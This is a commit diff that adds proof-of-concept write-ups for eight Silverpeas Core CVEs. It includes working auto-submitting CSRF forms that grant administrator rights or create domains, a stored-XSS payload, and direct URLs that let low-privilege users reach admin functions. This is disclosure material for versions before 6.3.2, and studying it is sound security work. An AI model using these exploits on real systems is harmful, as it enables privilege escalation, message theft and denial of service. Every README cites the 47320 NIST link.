Merge pull request #9 from TeneBrae93/master

Adding Silverpeas CVEs

Author: DaveYesland

CVE-2023-47320/README.md

@@ -0,0 +1,16 @@
+# CVE-2023-47320: Denial of Service via Broken Access Control in Silverpeas Core
+
+## Information
+**Description:** This allows denial-of-service by a low privileged user affecting the Silverpeas Core application. <br>
+**Versions Affected:** < 6.3.1 <br> 
+**Version Fixed:** 6.3.2  <br> 
+**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey)  
+**Disclosure Link:** https://rhinosecuritylabs.com/blog/  
+**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320  
+
+## Proof-of-Concept Exploit
+### Description
+Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control. An attacker with low privileges is able to execute the administrator-only function of putting the application in "Maintenance Mode" due to broken access control. This makes the application unavailable to all users. 
+
+### Usage/Exploitation
+After logging in as a low privileged user, go to this URL http://localhost:8080/silverpeas/RjobStartPagePeas/jsp/ActivateMaintenance?allIntranet=1. This places the application in "Maintenance Mode" and makes it unavailable to all users. 

CVE-2023-47321/README.md

@@ -0,0 +1,16 @@
+# CVE-2023-47321: Portlet Deployer Access via Broken Access Control in Silverpeas Core
+
+## Information
+**Description:** This allows low privileged users to access the Portlet Deployment tool. <br> 
+**Versions Affected:** < 6.3.1 <br> 
+**Version Fixed:** 6.3.2  <br> 
+**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey)  
+**Disclosure Link:** https://rhinosecuritylabs.com/blog/  
+**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320  
+
+## Proof-of-Concept Exploit
+### Description
+Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control via the "Portlet Deployet" which allows administrators to deploy .WAR portlets.  
+
+### Usage/Exploitation
+To exploit this vulnerability, an authenticated user needs to navigate directly to this URL: http://localhost:8080/silverpeas/portletDeployer.

CVE-2023-47322/CVE-2023-47322.html

@@ -0,0 +1,15 @@
+ <html>
+   <body>
+     <form action="http://localhost:8080/silverpeas/RjobDomainPeas/jsp/userModify">
+       <input type="hidden" name="Iduser" value="[AttackersID]" />
+       <input type="hidden" name="userLastName" value="[AttackersLastName]" />
+       <input type="hidden" name="userAccessLevel" value="ADMINISTRATOR" />
+       <input type="hidden" name="X&#45;STKN" value="[AttackersSTKNToken]" />
+       <input type="submit" value="Submit request" />
+     </form>
+     <script>
+       history.pushState('', '', '/');
+       document.forms[0].submit();
+     </script>
+   </body>
+ </html>

CVE-2023-47322/README.md

@@ -0,0 +1,17 @@
+# CVE-2023-47322: CSRF Leading to Privilege Escalation in Silverpeas Core
+
+## Information
+**Description:** The "userModify" request is vulnerable to Cross Site Request Forgery (CSRF) leading to privilege escalation. <br> 
+**Versions Affected:** < 6.3.1 <br> 
+**Version Fixed:** 6.3.2  <br> 
+**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey)  
+**Disclosure Link:** https://rhinosecuritylabs.com/blog/  
+**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320  
+
+## Proof-of-Concept Exploit
+### Description
+The "userModify" feature of Silverpeas Core 6.3.1 is vulnerable to Cross Site Request Forgery (CSRF) leading to privilege escalation. If an administrator goes to a malicious URL while being authenticated to the Silverpeas application, the CSRF will execute making the attacker and administrator user in the application. 
+
+### Usage/Exploitation
+To exploit this vulnerability, an attacker must host ```CVE-2023-47322.html``` on an attacker-controlled web server. When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator. 
+

CVE-2023-47323/README.md

@@ -0,0 +1,16 @@
+# CVE-2023-47323: Broken Access Control Allows Reading All Messages in Silverpeas Core
+
+## Information
+**Description:** The notification/messaging feature does not enforce access control on the ID parameter, allowing any user to read all messages (including admin-only messages). <br> 
+**Versions Affected:** < 6.3.1 <br> 
+**Version Fixed:** 6.3.2  <br> 
+**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey)  
+**Disclosure Link:** https://rhinosecuritylabs.com/blog/  
+**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320  
+
+## Proof-of-Concept Exploit
+### Description
+The notification/messaging feature of Silverpeas Core 6.3.1 does not enforce access control on the ID parameter. This allows an attacker to read all messages sent between other users; including those sent only to administrators. 
+
+### Usage/Exploitation
+To exploit this vulnerability, an attacker can use a script or Burp Suite Intruder to view all messages by attacking the ID parameter in this URL: http://localhost:8080/silverpeas/RSILVERMAIL/jsp/ReadMessage.jsp?ID=[messageID] - the messages begin at "1" and increase in intervals of 1. 

CVE-2023-47324/README.md

@@ -0,0 +1,16 @@
+# CVE-2023-47324: Stored XSS in Messages affecting Silverpeas Core
+
+## Information
+**Description:** The messaging feature of Silverpeas Core is vulnerable to Stored Cross-Site Scripting (XSS). <br> 
+**Versions Affected:** < 6.3.1 <br> 
+**Version Fixed:** 6.3.2  <br> 
+**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey)  
+**Disclosure Link:** https://rhinosecuritylabs.com/blog/  
+**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320  
+
+## Proof-of-Concept Exploit
+### Description
+The notification/messaging feature of Silverpeas Core 6.3.1 is vulnerable to Stored Cross-Site Scripting (XSS).  
+
+### Usage/Exploitation
+To exploit this vulnerability, the following payload can be sent in a message to another user: ```<img/src/onerror=prompt(1)>```. When the user opens it, it successfully executes Javascript in the user's browser. 

CVE-2023-47325/README.md

@@ -0,0 +1,16 @@
+# CVE-2023-47325: Broken Access Control on the "Bin" Allows Modification of Deleted Spaces in Silverpeas Core 
+
+## Information
+**Description:** Broken Access Control on the "Bin" allows low privileged users to access and modify deleted spaces in Silverpeas Core. <br> 
+**Versions Affected:** < 6.3.1 <br> 
+**Version Fixed:** 6.3.2  <br> 
+**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey)  
+**Disclosure Link:** https://rhinosecuritylabs.com/blog/  
+**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320  
+
+## Proof-of-Concept Exploit
+### Description
+The administrative "Bin" feature in Silverpeas Core 6.3.1 is affected by broken access control. A user with low privileges is able to navigate directly to the bin, revealing all deleted spaces. The user can then restore or permanently delete the spaces. 
+
+### Usage/Exploitation
+To exploit this vulnerability, an authenticated user needs to navigate directly to this URL: http://localhost:8080/silverpeas/RjobStartPagePeas/jsp/ViewBin. The bin successfully renders revealing all deleted spaces. The low privileged user can then restore or permanently delete the spaces. 

CVE-2023-47326/CVE-2023-47326.html

@@ -0,0 +1,15 @@
+ <html>
+   <body>
+     <form action="http://localhost:8080/silverpeas/RjobDomainPeas/jsp/domainSQLCreate">
+       <input type="hidden" name="domainName" value="Created&#45;By&#45;CSRF" />
+       <input type="hidden" name="domainDescription" value="" />
+       <input type="hidden" name="silverpeasServerURL" value="http&#58;&#47;&#47;localhost&#58;8080&#47;silverpeas" />
+       <input type="hidden" name="X&#45;STKN" value="[AttackerSTKNToken]" />
+       <input type="submit" value="Submit request" />
+     </form>
+     <script>
+       history.pushState('', '', '/');
+       document.forms[0].submit();
+     </script>
+   </body>
+ </html>

CVE-2023-47326/README.md

@@ -0,0 +1,16 @@
+# CVE-2023-47326: Domain Creation is vulnerable to CSRF in Silverpeas Core
+
+## Information
+**Description:** Silverpeas Core is vulnerable to Cross Site Request Forgery (CSRF) via the Domain SQL Create function. <br> 
+**Versions Affected:** < 6.3.1 <br> 
+**Version Fixed:** 6.3.2  <br> 
+**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey)  
+**Disclosure Link:** https://rhinosecuritylabs.com/blog/  
+**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320  
+
+## Proof-of-Concept Exploit
+### Description
+Silverpeas Core is vulnerable to Cross Site Request Forgery (CSRF) via the Domain SQL Create function. If an attacker clicks a malicious URL while authenticated to Silverpeas Core, the CSRF payload will create additional domains for authentication.  
+
+### Usage/Exploitation
+To exploit this vulnerability, an attacker must direct an administrator to a URL that loads the ```CVE-2023-47326.html``` file. 

CVE-2023-47327/README.md

@@ -0,0 +1,16 @@
+# CVE-2023-47327: The Space Create Function in Silverpeas Core is vulnerable to Broken Access Control
+
+## Information
+**Description:** The "create a space" feature in Silverpeas Core suffers from broken access control, allowing any user to create a space regardless of permissions. <br> 
+**Versions Affected:** < 6.3.1 <br> 
+**Version Fixed:** 6.3.2  <br> 
+**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey)  
+**Disclosure Link:** https://rhinosecuritylabs.com/blog/  
+**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320  
+
+## Proof-of-Concept Exploit
+### Description
+The "create a space" feature in Silverpeas Core is reserved for administrator use. This feature suffers from Broken Access Control, allowing any authenticated user to create a space by navigating directly to the correct URL.  
+
+### Usage/Exploitation
+To exploit this vulnerability, an attacker with low privileges needs to navigate directly to this URL with their X-STKN token: http://localhost:8080/silverpeas/RjobStartPagePeas/jsp/CreateSpace?X-STKN=[Users-STKN-Token]. The attacker can then type in a name and description and click "Ok" and the space is successfully created.